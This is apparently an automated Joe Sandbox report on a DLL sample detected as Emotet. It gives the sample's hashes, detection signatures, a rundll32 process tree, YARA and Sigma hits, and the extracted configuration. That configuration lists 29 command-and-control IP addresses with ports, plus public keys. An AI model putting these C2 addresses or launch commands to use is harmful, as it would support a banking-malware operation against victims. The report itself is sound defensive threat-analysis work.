Play interactive tour

Edit tour

Windows Analysis Report 6zAcNlJXo7

Overview

General Information

Sample Name:	6zAcNlJXo7 (renamed file extension from none to dll)
Analysis ID:	532221
MD5:	c7e23f2764d6ed9b59b0fed69a4488b0
SHA1:	67f31b13485f91be7952b3df5628f14ef1c86a38
SHA256:	d048f196a39fc7dae500b057fa000ebbb81ae2e6c18b4ddff445e8d7163f20ab
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Abnormal high CPU Usage

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Connects to several IPs in different countries

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4600 cmdline: loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6692 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4352 cmdline: rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4520 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5696 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf",Yyhhzevh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6104 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 160 cmdline: rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5712 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5816 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 2984 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4764 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4600 -ip 4600 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.573611715.0000000000835000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.633116457.0000000003380000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.643248675.0000000000BB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.770251757.0000000000A1A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.662542522.0000000000BB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.642444707.00000000013AC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.610590191.00000000006DA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.695566646.00000000013AC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.642741548.00000000031EA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.663733322.00000000013AC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.620846196.0000000000610000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.642650507.0000000003180000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.633278452.00000000035DA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.662941579.00000000013AC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.610563535.0000000000630000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.643478517.00000000013AC000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.641938795.0000000000BB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.663509938.0000000000BB0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.3202148.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.630000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.13b3b30.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.9.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3380000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.7a0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.6f2160.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.3202148.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.a33628.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.3180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.13b3b30.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.610000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.630000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.7a0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.bb0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.bb0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.3180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.a33628.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3380000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.6f2160.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.13b3b30.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.bb0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.35f42a0.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.610000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.35f42a0.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 33 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf",Yyhhzevh, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5696, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vxxnweikxwymx\qsgm.ruf",Control_RunDLL, ProcessId: 6104

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.0.loaddll32.exe.bb0000.9.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 6zAcNlJXo7.dll

Virustotal: Detection: 23%

Perma Link

Source: 6zAcNlJXo7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: 6zAcNlJXo7.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.649095483.000000000467A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.652558525.0000000004A11000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.677352599.0000000005681000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.659957517.0000000000832000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ED32FE7 FindFirstFileExW,		0_2_6ED32FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ED32FE7 FindFirstFileExW,		3_2_6ED32FE7

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 104.245.52.73:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 185.184.25.237:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 210.57.217.132:8080

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: unknown

Network traffic detected: IP country count 19

Source: WerFault.exe, 00000014.00000003.690493466.0000000005241000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.693988608.0000000005241000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.18.dr	String found in binary or memory: http://upx.sf.net

Source: loaddll32.exe, 00000000.00000002.695541549.000000000139B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.3202148.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.630000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13b3b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.7a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6f2160.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3202148.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a33628.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13b3b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.610000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.3180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.a33628.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6f2160.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.13b3b30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.35f42a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.35f42a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.573611715.0000000000835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.633116457.0000000003380000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.643248675.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.770251757.0000000000A1A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.662542522.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.642444707.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.770145294.00000000007A0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.610590191.00000000006DA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695566646.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.642741548.00000000031EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.663733322.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.620846196.0000000000610000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.642650507.0000000003180000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.633278452.00000000035DA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.662941579.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.610563535.0000000000630000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.643478517.00000000013AC000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.641938795.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.663509938.0000000000BB0000.00000040.00000010.sdmp, type: MEMORY

System Summary:

Source: 6zAcNlJXo7.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4600 -ip 4600

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Vxxnweikxwymx\qsgm.ruf:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Vxxnweikxwymx\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCED95	0_2_00BCED95
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC3ABE	0_2_00BC3ABE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBAEB9	0_2_00BBAEB9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCB0BA	0_2_00BCB0BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC56A9	0_2_00BC56A9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB68AD	0_2_00BB68AD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC04A4	0_2_00BC04A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBF4A5	0_2_00BBF4A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBC69B	0_2_00BBC69B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBF699	0_2_00BBF699
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBD899	0_2_00BBD899
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB3085	0_2_00BB3085
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD20F8	0_2_00BD20F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBE6FD	0_2_00BBE6FD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBBEF5	0_2_00BBBEF5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD06EF	0_2_00BD06EF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BBA8E8	0_2_00BBA8E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC7EDD	0_2_00BC7EDD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD0AD3	0_2_00BD0AD3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB54C0	0_2_00BB54C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BB3E3B	0_2_00BB3E3B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCCC3F	0_2_00BCCC3F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC0A37	0_2_00BC0A37
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BC0824	0_2_00BC0824
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BCBA18	0_2_00BCBA18
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00BD2C16	0_2_00BD2C16
